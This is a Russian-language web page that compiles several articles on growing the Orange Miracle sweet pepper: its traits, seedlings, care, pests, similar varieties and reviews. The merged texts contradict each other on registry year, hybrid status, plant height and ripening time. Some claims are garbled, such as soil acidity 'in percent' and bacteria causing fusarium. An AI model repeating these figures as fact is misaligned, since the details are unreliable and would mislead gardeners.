5 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Перец оранжевое чудо описание сорта фото отзывы

Перец Оранжевое чудо: описание, отзывы, похожие сорта оранжевого перца.

Среди огромного разнообразия агрофирм и, соответственно, сортов выделяется голландская селекция. Одним из наиболее известных сортов болгарского перца, выведенных в Голландии и отличающийся красивым ярко-оранжевым цветом, является перец Оранжевое чудо. Ему и некоторым другим со сходной окраской плодов посвящен этот обзор.

Перец Оранжевое чудо: описание сорта

• Раннеспелый сорт. Вегетационный период роста от всходов до технической готовности 95 – 110 дней.
• Высота кустиков 80 – 100 см.
• Плоды ярко-оранжевого цвета, форма кубовидная, крупные — масса 200 – 250 г, размеры 10 см х 9 см.
• Высокие вкусовые и товарные качества.
• Мякоть очень нежная, толщина стенок 0,5 – 0,8 см.
• Урожайность достигает 7 – 14 кг с кв. метра.
• Назначение: в свежем виде, консервация, заготовки.
• Демонстрирует устойчивость к вирусным болезням.
• Выращивание: в открытых грядках, в теплицах.

Перец Оранжевое чудо: описание агротехники выращивания

Приближается время для высева семян на рассаду. Оранжевое чудо, как сорт раннего созревания лучше высевать с конца февраля. Чтобы лишний раз не тревожить чувствительную корневую систему перцев, сеять семена можно сразу в отдельные горшочки и обойтись без последующей пикировки. А если необходимо сэкономить место, можно сначала посеять их в специальные планшетки, которые удобно размещать и переносить, а также компактно и надежно устанавливать, если будет необходимость в дополнительном освещении.

Агротехника выращивания Оранжевого чуда в целом сходна с другими сортами перцев. Обратить внимание следует на температуру воздуха в помещении, так как перцы довольно капризны в этом отношении: если в ночное время становится заметно прохладнее, то лучше включать обогреватель на небольшую мощность. Поливать рассаду рекомендуется теплой водой и следить за влажностью – перцы не любят ни пересушенного воздуха, ни такой же почвы. Рассаду Оранжевого чуда обязательно закаливают перед высадкой. Селекционеры рекомендуют высаживать кустики в конце мая, а если климат в регионе более прохладный — в начале июня. Подкормки проводят по стандартной схеме, не пропуская, так как плоды этого сорта ожидаются довольно крупными.

Перец Оранжевое чудо: отзывы дачников

Огородники, выращивающие на своих участках этот сорт, любят его за сочность плодов, которые, кроме вкусовых качеств, отлично подходят для консервирования, например, приготовления лечо или фарширования. Само растение устойчиво к заболеваниям и вредителям, рассада выносливая и очень хорошо укореняется после посадки.

Иногда отмечают, что плоды не всегда имеют кубовидную форму, а иногда вырастают слегка удлиненными с интересным носиком на конце. Многим очень нравится аромат и повышенная сладость этих перцев. По параметрам урожайности замечено следующее: на одном кустике созревает в среднем 8 – 10 перчинок. Рекордом считается завязывание и, естественно, вызревание 12 перцев.

Перец Оранжевое чудо в грунте: видео

Где купить семена сорта Оранжевое чудо

Покупка семян этого сорта не вызовет особых проблем. Семена Оранжевого чуда выпускают агрокомпании Аэлита, Поиск, Урожай Удачи, Семена Алтая, АэлитаАгро и другие. Их можно найти и в интернет-магазинах, и в крупных гипермаркетах, и в маленьких местных специализированных магазинчиках. Цена пакетика варьируется в пределах 20-30 руб.

Единственное, при покупке нужно обратить внимание на то, что некоторые агрофирмы (Семко, Уральский дачник) продают гибрид Оранжевое чудо F1. Сортовые качества гибрида будут лучше, однако собрать семена самостоятельно, чтобы дальше культивировать этот перец, не получится. Цена такого пакетика так же будет выше примерно в два раза, в районе 60-70 руб.

Другие популярные сорта оранжевого перца

Оранжевые сорта перца популярны и привлекают огородников, разумеется, интересной и необычной окраской плодов. Овощеводы, высаживающие перец Оранжевое чудо, отзывы оставляют и о других сортах сладкого перца с таким же окрасом плодов. Поэтому можно порекомендовать следующие сорта:

Оранжевое наслаждение F1.

Гибридный, довольно скороспелый, как и Оранжевое чудо, время роста около 100 дней. Отличается удлиненной формой плодов (13 см х 7 см). Перцы имеют нежную кожицу, толщина мякоти 0,6 – 0,7 см, средний вес 140 г. Сорт рекомендуется для теплиц, где показывает урожайность до 6 — 7 кг с кв. метра. Плоды завязываются хорошо, а созревают дружно.

Оранжевая красавица F1. Гибридный сорт универсального выращивания. Плоды кубовидной формы, четырехгнездные и покрупнее, чем у «Оранжевого чуда» – в среднем весят 200 г. Характеризуется ранним сроком созревания — около 90 дней. Плоды толстостенные (0,9 см). Сорт отличается повышенной устойчивостью к вертицилёзному увяданию. При плотности посадки 6 – 8 кустов на кв. метр урожайность составляет до 9 кг.

Гигант оранжевый.

Универсальный сорт селекции Уральский дачник, созревание начинается через 70 дней после высадки саженцев. Плоды кубовидной формы, четырехгранные, толстостенные (1 см), размеры 10 х 10 см. Демонстрируется устойчивость к вирусным болезням перцев. Отличается крупноплодностью, средний вес перца около 250 г. Славится вкусовыми качествами и отлично подходит для фаршировки.

Оранжевый лев F1. Сорт агрофирмы Аэлита, гибридный, скороспелый (100 дней). Интересна форма плодов: продолговатая кубовидная. Куст не имеет ограничения роста, полураскидистый. Перцы имеют среднюю толщину стенки – 0,7 см. Сорт хвалят за сочность мякоти и ее сладость. Средний вес перчинки 180 г. Это сорт универсального выращивания и назначения.

Оранжевый король.

Сорт, подходящий для выращивания под укрытиями из плёнки. Имеет универсальное назначение. Плоды среднего веса 170 г. Толщина мякоти 0,6 см. Перцы вкусные и ароматные, призмовидной формы. Урожайность сорта 4,1 кг с кв. метра.

Оранжевый принц. Ранний компактный сорт, крупноплодный. Средняя масса 170 г. Толщина стенок до 1 см. Отличается высокой урожайностью, имеет отличный вкус.

Оранжевое манго F1. Гибридный сорт раннего созревания, очень похожий на Оранжевое чудо. Плоды крупноплодные весом до 250 г. Отличается устойчивостью к вершинной гнили. Его рекомендуют для культивирования в теплицах. Имеет хорошие товарные характеристики.

Оранжевый юбилейный. Универсальный раннеспелый сорт (созревание 95 – 100 дней). Интересен округлой формой перцев. Они небольшие: средний вес около 90 г. Плоды толстостенные (1 см).

Многие садоводы ежегодно выращивают на своих участках Оранжевое чудо, как сорт довольно популярный и проверенный, но, как видно, из обзора можно подобрать ему замену или просто опробовать что-нибудь новенькое оранжевое в грядущем сезоне.

Поделитесь полезной информацией:

Описание перца Оранжевое чудо

Перец Оранжевое чудо — продукт голландской селекции. В последнее время этот сорт пользуется популярностью. Он обладает отменными характеристиками вкуса и товарного качества. Благодаря крупным плодам яркого окраса, он станет украшением для вашего огородного участка. Подробное описание этого сорт.а представлено в статье

Перец Оранжевое чудо

Характеристика сорта

Перец Оранжевое чудо был выведен в Голландии. Самые квалифицированные специалисты занимались разработкой сорта, поэтому смогли создать действительно хороший продукт. В 2007 году он получил возможность быть включенным в Государственный реестр России.

Изначально он был выведен для выращивания в теплице. Со временем разновидность была усовершенствована. В конечном итоге, разрешается выращивание в открытом грунте, но только при теплом климате (то есть, в южных регионах страны).

Перец Оранжевое чудо- кустарниковый, он относится к среднеспелым сортам. Вегетация длится на протяжении 110 дней. По истечению этого срока можно собирать плоды, которые достигли технической зрелости. То есть, полностью сформировали форму и вес, но не брали окраску.

Показатели урожайности высокие: с 1м2 можно собрать не менее 15 кг плодов товарного качества.

Описание куста

Высота куста достигает максимальной отметки в 100 см. На каждом из них возможно формирование сразу 10 плодов.

Листья представлены в небольшом количестве. Цвет листвы темно-зеленый. На поверхности наблюдается небольшое количество морщин. Главный стебель мощно развит, и содержит небольшое количество боковых побегов. Не сильно раскидывается вокруг, поэтому возможна густая посадка.

Особенности плода

Описание плодов перца Оранжевое чудо:

  • плод представлен кубовидной формы, с насыщенным оранжевым оттенком;
  • масса отдельного сформированного плода составляет 250 г;
  • его длина достигает 10 см, а вот диаметр перца составляет 9 см;
  • стенки представлены толщиной в 7 мм.

Мякоть сочная, но не водянистая. По вкусу сладкий, без признаков горечи.

Сладкий перец Оранжевое чудо относится к универсальным разновидностям и подходит для салатов, консервации и употребления в свежем виде. Многие отзывы указывают на то, что вкусовые качества сохраняются при консервации или солении плода.

Подготовка к высадке

Хорошие семена — хороший урожай

В первую очередь, следует позаботиться о качестве семян. Семена перца Оранжевое чудо нужно обеззаразить с помощью марганцового раствора или раствора из сока алоэ. Это делается для того, чтобы убить все бактерии и повысить иммунитет семян.

Затем семена нужно промыть под проточной водой и тщательно просушить. После обработки можно сажать в контейнеры.

Для рассады используются отдельные контейнеры. В ином случае, при пересадке рассады на постоянное место можно повредить корневую систему.

В каждом контейнере нужно проделать дренаж в виде дырки на дне. Это делается для того, чтобы избыточная влага выходила наружу, а не сохранялась в корнях. Ведь это может привести к их гнили.

Подготовка контейнеров

Перед посадкой семян нужно наполнить контейнер легкой почвой: смешать песок, перегной и обычную землю, в соотношении 1:2:1.

Почву нужно полить небольшим количеством воды и посадить семена вглубь на 3 см, что позволяет корням формироваться на глубине, чем повышает устойчивость куста. Затем можно засыпать посадочный материал небольшим количеством оставшегося грунта и немного уплотнить.

В помещении, где будут храниться контейнеры, следует придерживаться температуры в 25°С. Только в таких условиях наблюдается лучшая всхожесть семян. После появления первых признаков всходов температуру можно снизить до 16°С.

Подготовка почвы

Осенью в почву нужно внести органику в виде перегноя или торфа. Обратите внимание на то, чтобы кислотность почвы была низкой и не превышала показатель в 4%. В ином случае, нужно в грунт вносить известь.

Пересадка готовой рассады (с наличием 5 листьев и высотой 15 см) в теплицу должна проводиться по схеме 50х50.

Сразу подготовьте опоры для подвязывания кустов. В открытом грунте между рядами дистанция должна составлять около 60 см, а между лунками 40 см. Также нужно позаботиться о подпорках.

Рекомендации по уходу

Удобрения способствуют росту

Характеристика правил по уходу за перцем Оранжевое чудо предполагает соблюдение температуры, своевременный полив и внесение удобрений.

Полив

В первую очередь нужно обращать внимание на полив. Важно следить за уровнем влажности грунта, чтобы не допустить нарушение корневой системы.

Для этого нужно проводить полив 1 раз в 3 дня и только утром. Это необходимо, чтобы влага сохранялась в почве, а не испарялась.

Если же вы выращиваете болгарский перец Оранжевое чудо в теплице, то не забывайте опрыскивать листву на кустах. Ведь сухой воздух в помещении может нарушить процесс формирования завязей и плодов.

Температурный режим

Температура воздуха в теплице не должна быть ниже 25°С. Эта культура даёт хорошую урожайность только в условиях высоких температур.

В открытом грунте нужно позаботиться о затенении участка с перцами при температуре воздуха более 35°С. В этом случае,ботва начнет сохнуть, что приведет к снижению урожая.

Подкормки

Подкормки должны проводиться три раза за период вегетации.

  1. Первая проводится в момент формирования первых ростков. Нужно использовать только фосфорные вещества, которые ускоряют этот процесс.
  2. Вторая подкормка состоит из калиевых соединений. Она проводится в период образования завязей. Это позволяет ускорить процесс формирования.
  3. Третья подкормка, включающая в себя кальций и азот, проводится в период плодоношения. Благодаря этим минеральным веществам увеличивается размер плодов и ускоряется их созревание.

Паразиты и болезни

Основным паразитом, который влияет на эту разновидность перцев, считается тля. Для борьбы с ней нужно использовать такие препараты, как «Акарин», «Фастак» или «Танрек».

Готовится раствор для опрыскивания следующим образом: в 10 л теплой воды нужно развести 1 столовую ложку препарата. Помните, что опрыскивание проводится только перед и после цветения. Во время плодоношения проводить опрыскивание запрещено, ведь это приведет к нарушению структуры самого плода.

Паутинный клещ

Избавить от такого паразита, как паутинный клещ, можно с помощью раствора лука или чеснока. Лук или чеснок нужно пропустить через мясорубку и развести в воде. На 1 столовую ложку кашицы нужно брать 1 л воды. Такое опрыскивание проводится в любой момент времени. От слизней помогает острый молотый перец. Его нужно распылять над каждым кустом. Лучше это делать не в ветряную погоду, чтобы препарат попадал на зараженные участки.

Фузариоз

Если растение подверглось такому заболеванию, как фузариоз, то придется только сжигать зараженный куст. К сожалению, это грибковое заболевание вылечить невозможно. Сжигать куст лучше вдали от огорода, чтобы не заразить другие культуры. На следующий год в этом месте эту культуру лучше не сажать, ведь бактерии не успеют исчезнуть.

Преимущество болгарского перца Оранжевое чудо заключается в том, что это единственный вид, который не подвергается вирусу табачной мозаики. Также отмечается устойчивость к таким болезням, как фитофтороз или антракноз.

Гибрид, который не оставит вас равнодушными — перец «Оранжевое чудо» и особенности его выращивания

Сладкий болгарский перец пользуется особенной популярностью у садоводов. Крупные плоды с большим количеством мякоти, сладкий вкус без горчинки, возможность использования в заготовках на зиму — это лишь малая часть причин, по которым этот овощ любят дачники.

В числе наиболее популярных гибридов — перец Оранжевое сердце. Культура отличается высокой урожайностью и стойким иммунитетом к болезням. Как вырастить перец на своем участке и не разочароваться в выборе – читайте далее.

Что это за сорт перца

Оранжевое Чудо F1 – гибрид первого поколения. Был внесен в государственный российский реестр в 2007 г.

С тех пор культура пользуется стабильным спросом у садоводов. Его выпускают производители «Аэлита», «Седек», «Семко».

Внимание! Некоторые фирмы под названием Оранжевое чудо выпускают другой кустарниковый перец. Он обладает острым вкусом и совершенно другими характеристиками. Перед покупкой семян важно внимательно ознакомиться с данными на упаковке.

Отличительные черты

Оранжевое чудо – это болгарский сладкий перец. Главной его особенностью считаются яркие сочные плоды, крупные, кубовидной формы. Имеют ярко-оранжевый цвет внутри и снаружи, глянцевую кожицу. Вкус перца сладкий, с легкой освежающей кислинкой. Аромат насыщенный. Горчинки нет даже в стадии технической зрелости.

Еще одна отличительная черта гибрида – высокая урожайность. Несмотря на то, что семена из плодов не подходят для посадки, его выгодно сажать даже для продажи.

Оранжевое чудо обладает высоким иммунитетом. Он не боится ни вирусных, ни грибковых заболеваний, что существенно упрощает уход за растением.

В перце содержится большое количество бета-каротина. Это делает овощ особенно полезным для детей и людей, страдающих авитаминозом.

К отрицательным чертам гибрида относится отсутствие холодоустойчивости. Он рекомендован для культивирования в теплице. Выращивание в открытом грунте возможно только в регионах с жарким климатом.

Характеристика гибрида

Описание Оранжевого чуда на упаковке полностью соответствует реальным характеристикам. Его плоды получаются блестящими и красивыми, как на фото. Но не только красота плодов делает гибрид таким популярным.

Предлагаем оценить остальные характеристики с помощью таблицы:

Параметр Показатели
Тип куста Высокорослый. В высоту достигает 1 м. Стебли мощные и прочные. Относится к кустарниковому типу. Кусты не сильно раскидистые, компактные. Листья темно-зеленые, средних размеров, слабо морщинистые. Образуются на растении в большом количестве.
Способ выращивания Теплолюбивая культура. Рекомендована для выращивания в теплицах. В южных регионах возможна высадка в открытый грунт.
Урожайность Высокая. С 1 кв. м получают до 15 кг плодов.
Плоды Крупные. В среднем масса каждого из них варьируется в пределах 150–250 г. Вес отдельных экземпляров достигает 300 г. Цвет плодов ярко-оранжевый. Кожица глянцевая. Форма кубовидная. В среднем один перец в длину достигает 10 см, в ширину – 9. Имеется выраженная ребристость с обеих сторон, которая распространяется по всей плоскости. Толщина стенок 7–9 мм. Мякоть имеет насыщенно сладкий вкус, с легкой кислинкой и перечным ароматом.
Транспортабельность Высокая. Перец хранится более месяца и подходит для перевозки на большие расстояния.
Сроки созревания Относится к раннеспелым сортам. Первые плоды созревают через 105–115 дней после посева семян.
Устойчивость к болезням Имеет иммунитет к грибковым и вирусным заболеваниям.

Подготовка к выращиванию

Перед использованием семян их обязательно подготавливают. Посадочный материал перебирают, удаляя потемневшие и поврежденные экземпляры, и дезинфицируют, замачивая в одном из средств:

  • перекись водорода – 15 мин.;
  • светло-розовый раствор марганцовки – 20 мин.;
  • «Фитоспорин» – 6 ч.;
  • сок алоэ, разведенный напополам с водой – 12 ч.;
  • раствор 1 ч. л соды в стакане воды – 12 ч.

После этого семена проращивают. Делают это следующим способом:

  1. Семена замачивают на 5 ч. в воде с температурой 40°C тепла. Важно следить за тем, чтобы температура жидкости не опускалась ниже этой отметки.
  2. После этого семечки заворачивают во влажную марлю, помещают в блюдце, накрывают пленкой и ставят в теплое место на 2-3 дня. Все это время регулярно смачивают материал теплой жидкостью.

По истечении этого времени семена должны набухнуть и проклюнуться. Это признак – посадочный материал готов к посадке.

Перед посадкой перца на постоянное место выращивают рассаду. В противном случае растение не успеет отдать урожай до заморозков.

Помимо семян, для выращивания рассады нужно подготовить следующие материалы:

  1. Емкости. Лучше использовать сразу индивидуальные торфяные таблетки или горшочки. Если такой возможности нет, семена сначала сажают в общий ящик, а затем подросшую рассаду пикируют в индивидуальные горшочки.
  2. Грунт. Подойдет покупная почвосмесь для рассады и перца. Готовят грунт и самостоятельно, смешивая в равных пропорциях садовую землю, перегной и песок.
  3. Темно-розовый раствор марганцовки. Им дезинфицируют емкости, грунт и дренаж.
  4. Дренаж. Подойдет крупный песок, битая керамика, измельченный керамзит или мелкий щебень.

Выращивание рассады

Семена на рассаду сеют в начале марта или в конце февраля. От посева посадочного материала до высадки перца в грунт должно пройти 80 дней.

Совет! По мнению садоводов, при выращивании в теплице рассада получается более крепкой и жизнеспособной.

Посадка перца

Перец сеют или сразу в индивидуальные горшочки, или в общий ящик.

Инструкции по каждому варианту:

  1. Ящик. На дно емкости насыпают слой песка 3 см. Сверху засыпают грунт. Его поливают теплой водой или стимулятором роста. В грунте делают канавки глубиной 2 см. В них раскладывают семена, между которыми должно оставаться расстояние со всех стон 3 см. Посевы засыпают землей, накрывают пленкой и ставят в теплое место.
  2. Индивидуальные горшочки. Их наполняют грунтом, дренажом и поливают теплой водой. В каждую емкость на 2 см заглубляют по 2 семечки. После прорастания более слабый стебель прищипывают. Горшки накрывают пленкой и убирают в теплое место.
  3. Торфяные таблетки. Заготовки складывают в глубокую емкость отверстием вниз. Их заливают кипятком и оставляют до разбухания. Затем в каждую таблетку высаживают по 1 семечку. Заготовки с семенами накрывают пленкой и убирают в теплое место.

Дальнейший уход

Неокрепшие ростки нуждаются в особенно тщательном уходе. В противном случае не удастся получить здоровые растения.

Инструкция по уходу:

  1. После того, как появятся первые всходы, парник разбирают. Рассаду переставляют на подоконник. Перец – теплолюбивая культура, поэтому часто необходима дополнительная подсветка люминесцентной лампой.
  2. Если люминесцентные лампы не используются, то ежедневно горшки с растениями поворачивают. Это предотвратит наклон перца в одну сторону.
  3. Если семена сеяли в общую емкость, то после появления двух настоящих листочков перец пикируют в индивидуальные горшочки. Если рассаду сразу начали выращивать в индивидуальных горшочках, то прищипывают более слабое растение.
  4. За весь период выращивания рассады ее подкармливают 2 раза. Первый – через 14 дней после пикировки растений, второй – за 5 дней до высадки на постоянное место. Используют покупные препараты «Крепыш» или самодельные питательные подкормки (раствор коровяка, золу, биогумус).

Особенности выращивания сорта и возможные трудности

Перец Оранжевое чудо лучше всего себя чувствует в теплицах. В южных регионах возможно выращивание и в открытом грунте.

Так как сорт теплолюбивый, первые две недели после пикировки в открытый грунт его обязательно накрывают на ночь пленкой, защищая от заморозков. В холодные дни это делают даже днем.

Перец имеет мощный главный стебель. Подвязывать его не обязательно, но многие садоводы все же предпочитают прикреплять растения к опоре.

Растение требовательно к поливам. Почву нужно увлажнять не менее трех раз в неделю. Воду льют не только под корень. Ею опрыскивают кусты. Используют только отстоявшуюся жидкость комнатной температуры.

Чтобы получить хороший урожай, за весь период выращивания перец вносят минимум три подкормки. Первый раз через 14 дней после пикировки, второй – в период образования соцветий, третий – при созревании плодов. Используют комплексные удобрения. Первый раз в их составе должен содержаться азот, а вот остальные подкормки – с минимальным количеством этого вещества.

Посадка на постоянное место

Для перца выбирают грядки в наиболее солнечном участке сада. На них за год до этого не должны расти другие пасленовые культуры.

Перцы разных сортов и гибридов не сажают на соседних грядках. Они имеют свойство переопыляться.

Осенью начинают подготовку грядок. Их перекапывают и очищают от сорняков. На 1 кв. м вносят 6 кг перепревшего навоза или перегноя.

Совет! Лакмусовой бумажкой легко измерить кислотность почвы. Если показатель выше 4%, то вносят сухую известь.

Весной грядки разравнивают граблями и очищают от сорняков. Грунт поливают горячим медным купоросом.

В теплицах почву, на которой ранее выращивались перцы, заменяют новым грунтом. Его тоже обязательно дезинфицируют.

Лунки для перца выкапывают рядами в шахматном порядке. Используют схему 50х50. На 1 кв. м помещается до 4 растений.

В каждую лунку выливают по 1 л воды. После того, как она впитается, засыпают по 1 ст. л. золы и комплексные минеральные удобрения длительного действия.

Углубления с перцем засыпают грунтом. Корневую шейку растений при этом не заглубляют.

Правила ухода

Чтобы получить здоровые растения и обильный урожай, важно соблюдать основные правила выращивания этой культуры:

  1. Чтобы перец хорошо себя чувствовал, несколько раз за сезон его опрыскивают борной кислотой или средством, приготовленным из ведра воды и 1 ст. л. нитрофоски.
  2. Перец любит опрыскивания, но в период цветения этого делать нельзя. В противном случае пыльца слипнется, и опыления не произойдет.
  3. Чтобы ускорить опыление, перечные грядки опрыскивают сладкой водой. Она привлечет полезных насекомых.
  4. Лишние листья с нижней части куста нужно удалять. Процедуру поводят раз в неделю, удаляя не более трех листьев.
  5. Чтобы получить богатый урожай, плоды снимают в стадии технической зрелости. Они поспеют в домашних условиях. Избавившись от плодов, перец начинает образовывать новые пасынки с урожаем.
  6. Грядки обязательно накрывают мульчей (соломой, сеном, торфом). Этот слой защитит растения от болезней, вредителей, холода и засухи.
  7. После каждого полива почву рыхлят и удаляют сорняки — они повреждают и угнетают корневую систему перца.
  8. Если на стеблях образуются дополнительные корешки, их присыпают землей.

Характерные болезни и вредители

Перец Оранжевое чудо имеет стойкий иммунитет к грибковым и вирусным заболеваниям. Поэтому растение не опрыскивают химическими средствами в целях профилактики.

Перец важно защищать от насекомых. Они повреждают кусты и урожай, а также разносят инфекции:

  1. От мелких вредителей, таких как тля и паутинный клещ, защитит отвар полыни. Если вредители уже завелись на кустах, то их опрыскивают мыльным раствором, приготовленным из ведра воды и натертого куска хозяйственного мыла.
  2. От колорадского жука защищает «Барьер». Собирают крупных вредителей и вручную.
  3. Чтобы избавиться от слизней, достаточно опрыскать растения средством, приготовленным из ведра воды и нескольких измельченных острых перцев.

Чтобы растения не заболели, нужно соблюдать правила профилактики: уход и соблюдение принципов севооборота, проветривание теплицы.

Преимущества и недостатки гибрида

Преимущества Оранжевого чуда:

  • иммунитет к болезням пасленовых;
  • высокая урожайность;
  • яркие и вкусные плоды;
  • повышенное содержание полезных веществ в перцах;
  • отсутствие пасынкования.

Недостатком считается гибридность и неустойчивость к похолоданиям.

Отзывы

Перец Оранжевое чудо имеет много хороших отзывов. Этот гибрид пользуется популярностью благодаря хорошему вкусу плодов и высокой урожайности.

Лариса, г. Пермь: «Перец Оранжевое чудо выращиваю в теплице не первый год. Очень урожайный гибрид. Не болеет и не требует формирования, поэтому ухаживать за ним легко. Главное – регулярно поливать посадки и не забывать их подкармливать. Я использую силос, суперфосфат и золу. Плоды красивые и крупные: то, что нужно для салатов».

Татьяна, г. Солнечногорск: «В прошлом году подруга поделилась семенами Оранжевого чуда. Теперь это мой любимый гибрид. Очень понравились крупные, яркие толстостенные перчики. Они идеальны для салатов и лечо. Урожай очень большой. Хватило даже на заморозку. Я морожу перчики целыми, вычищая семена. Потом всю зиму едим свой фаршированный перец».

Заключение

С перцем Оранжевое чудо способны соревноваться в популярности немногие сорта. Этот гибрид отличается высокой урожайностью и красивыми вкусными плодами.

Вырастить перец несложно. Он не боится заболеваний и не требует формирования. Главное – защищать его от пониженных температур, регулярно поливать и своевременно подкармливать.

Покупая семена с названием Оранжевое чудо, обращайте внимание на характеристики и описание. Иначе есть вероятность получить вместо сладкого мясистого болгарского перца острый перчик с таким же названием.

Характеристики раннеспелого перца Оранжевое чудо и особенности его выращивания

Перец Оранжевое чудо – сорт Голландской селекции, он славится у огородников своими высокими продуктивными качествами. Отличается отменными вкусовыми характеристиками, а внешний вид плодов заставляет дачников удивляться и восхищаться.

Происхождение сорта перца Оранжевое чудо

Данный гибрид был получен методом скрещивания иных сортов перца (их было большое количество, поэтому основных «родителей» определить очень трудно). Оранжевое чудо перенял все лучшие качества других перцев. Родина выведения – Голландия.

На данный момент сорт перца Оранжевое чудо считается практически самым популярным на территории России. Его постарались вырастить на своем участке многие садоводы, и все они остались довольны результатом.

Не все гибридные сорта перца проходят сертификацию и заносятся в государственный реестр России. Оранжевое чудо внесен в данный список в 2012 году. Это доказывает его значимость для садоводов и дачников не только России, но и всего мира.

Описание и характеристики сорта

Особенность перца Оранжевое чудо – плоды ярко-оранжевого оттенка, а кусты высокие.

Растение высокорастущее и крепкое, но несмотря на это, на участке куст не занимает слишком много места. При выращивании перца в открытой земле, его высота достигает 2-х м, а порой и выше. Листва отличается небольшими размерами, насыщенно зеленого цвета.

Плоды

Главные характеристики плодов:

  • в форме куба, немного пониклые;
  • большие по размеру;
  • масса одного – около 220 г;
  • сочная мякоть;
  • неполная зрелость – плоды зеленого оттенка, полное созревание – ярко-оранжевый оттенок;
  • превосходный сладкий вкус.

Урожайность

Срок созревания плодов Оранжевое чудо – 105 дней, в это время их можно уже снимать с растения. Интересный факт – снятые с куста плоды дозревают дома еще неделю.

Снимайте урожай именно на этапе технической зрелости, так как это способствует формированию новых завязей на кустах. Оранжевое чудо отличается высокой урожайностью – 14-16 кг с 1 кв. м.

Отличие от других сортов

Гибрид отличается от других сортов перца большими плодами, его стенки очень крепкие и сочные. Мякоть вкусная и ароматная. Отличительная особенность – устойчивость к заболеваниям, а именно к вирусу табачной мозаики. Этим не могут похвастаться другие сорта перца.

Агротехника выращивания

Агротехника выращивания любого сорта перца начинается с подготовки семян к посеву. Посевной материал необходимо обеззаразить при помощи слабого раствора марганцовки, также можно воспользоваться соком алоэ. Процедура проводится для уничтожения в семенах бактерий и повышения иммунитета зёрен.

После обработки промойте семена под проточной водой и можете высаживать их в подготовленные ёмкости.

Подготовка контейнеров

Каждый росток перца Оранжевое чудо выращивайте в отдельных горшках, иначе существует вероятность повреждения корневой системы растений. В ёмкостях сделайте дырки для лучшего и скорейшего выхода лишней влаги.

На дно горшочков, обязательно помещайте дренажный слой.

Подготовка почвы

Перед посадкой зёрен наполните горшки легким грунтом, состоящим из песка (1 часть), перегноя (2 части) и обыкновенного грунта (1 часть).

Предварительно почву желательно обеззаразить. Как правильно это можно сделать – читайте здесь.

Землю полейте малым количеством воды и посадите посадочный материал на глубину 3 см, это даст возможность корневой системе нормально и быстро развиваться. После этого засыпьте семена малым количеством земли и слегка уплотните.

В помещении с рассадой придерживайтесь температуры в +25 градусов по Цельсию. Такие условия помогут повысить всхожесть посевного материала. После появления всходов температуру понизьте до +16 градусов.

Рассада

Семена на рассаду сеют на последней неделе февраля. Сильно заглублять зёрна не стоит, посадочные горшки накрывают плёнкой или стеклом.

Пикировка

Пикировка осуществляется только в том случае, если вы высаживали ростки в 1 ящик или большой горшок. Данный процесс заключается в пересадки ростков в отдельные ёмкости. Проводят пикировку после появления 2-х настоящих листов.

Высаживайте семена сразу в отдельные тары, чтобы в дальнейшем во время пикировки корневая система перца не повредилась.

Пересадка в открытый грунт

До пересадки рассады в открытую почву, ростки закаляют, то есть выносят на свежий воздух за 2 недели до пересадки. Сначала на час, затем на 2-3 часа и так далее.

Посадка

В осенний сезон года в грунт внесите органические удобрения в виде перегноя или торфа. Особое внимание обратите на кислотность земли, она не должна быть слишком низкой (около 3-4 %). В противном случае придется вносить известь.

Готовую рассаду пересаживайте, когда на ней полностью сформировались 5 листов, в высоту достигшие 15 см. В парник растения пересадите по схеме 0,5*0,5 м. Сразу позаботьтесь об опорах для подвязывания растений. В открытой почве оставьте примерно 0,6 м, между углублениями 0,4 м. Также подготовьте подпорки.

Подвязка

Жесткие опоры необходимы данному сорту сладкого перца, так как растения достигают высокого роста, и им необходимо на что-то опираться.

В формировании перец Оранжевое чудо не нуждается.

Полив

Полив – это самый главный пункт по уходу за перцем. Необходимо регулярно следить за влажностью почвы, чтобы не допустить загнивание корневой системы. Осуществляйте внесение воды 1 раз в 3 дня и делайте это только утром или вечером. В противном случае вода слишком быстро испарится.

Болгарский перец Оранжевое чудо, выращиваемый в парнике, нуждается в регулярных опрыскиваниях листвы. Так как сухой воздух мешает растению полноценно формировать завязи и плоды.

Мульчирование и рыхление

После обильного полива перца необходимо удалить все лишние сорняки и провести рыхление почвы. Немало важной является мульча, в качестве мульчирующего материала используйте торф, солому или опилки.

Узнать всё о мульчировании почвы, вы сможете из этой статьи.

Подкормка

Внесение удобрений стандартно для всех сортов перца и проводится 3 раза за вегетационный сезон:

  1. В период формирования первых ростков. Вносите фосфорные микроэлементы, которые ускоряют рост и развитие перца. Читайте больше о подкормке рассады перцев на страницах нашего сайта.
  2. В период формирования завязей. Состоит из калийных удобрений, которые помогают ускорить процесс их образования.
  3. В период плодоношения. Удобрения состоят из кальция и азота, благодаря им размер плода значительно увеличивается и процесс созревания ускоряется.

Болезни и вредители

Самое опасное насекомое для перца – тля. Для защиты перца от вредителя необходимо проводить регулярные обработки. Другие болезни и вредители Оранжевому чудо не страшны, иммунитет против них заложен у культуры на генетическом уровне.

Особенности выращивания в теплице

Выращивания сладкого перца в открытом грунте и в парнике имеют свои особенности, рассмотрим главные правила ухода за сортом в теплице:

  • Регулярный полив. При отсутствии влаги сорт перестает расти. Если в открытой почве воду, растение может получить благодаря дождю, то в парнике без вашего участия не обойтись. Растения от нехватки влаги вырастут низкими, а весь урожай – маленьким и плохо развитым.
  • Высокая влажность воздуха. Перец сорта Оранжевое чудо, негативно относится к слишком пересушенному воздуху в парнике. Регулярно опрыскивайте растения, чтобы воздух и грунт возле него не высыхали.
  • Внесение удобрений. Перец данного сорта очень крупный, поэтому без удобрений вырасти полноценным и крепким он не сможет. Только не увлекайтесь с азотными подкормками, иначе кроме густой листвы, вы ничего не получите.
  • Температурный режим. Придерживайтесь постоянной температуры. Перец Оранжевое чудо хорошо растет при температуре +25…+30 градусов по Цельсию.

Данный сорт перца очень чувствительный к изменениям температуры, когда она опускается на показатель +13 градусов, то растение вовсе перестает расти и развиваться.

Все эти правила учитывайте при выращивании данной культуры, в регионах со слабым и неустойчивым климатом осуществляйте дополнительный обязательный обогрев.

Преимущества и недостатки

Перец сорта Оранжевое чудо имеет свои плюсы и минусы, рассмотрим их.

Преимущества данного сорта:

  • быстрый срок созревания плодов. Первый урожай можно получить на 105 день после появления всходов. При качественных условиях срок созревания уменьшается в 95 дней;
  • не нуждается в особом уходе, просто выращивается на любой территории;
  • превосходно переносит разные негативные факторы окружающей среды, к примеру, проливные частые дожди;
  • перец обладает приятным и насыщенным вкусом;
  • во время хранения вкусовые качества плода не меняются;
  • крепкий иммунитет ко многим видам болезней.

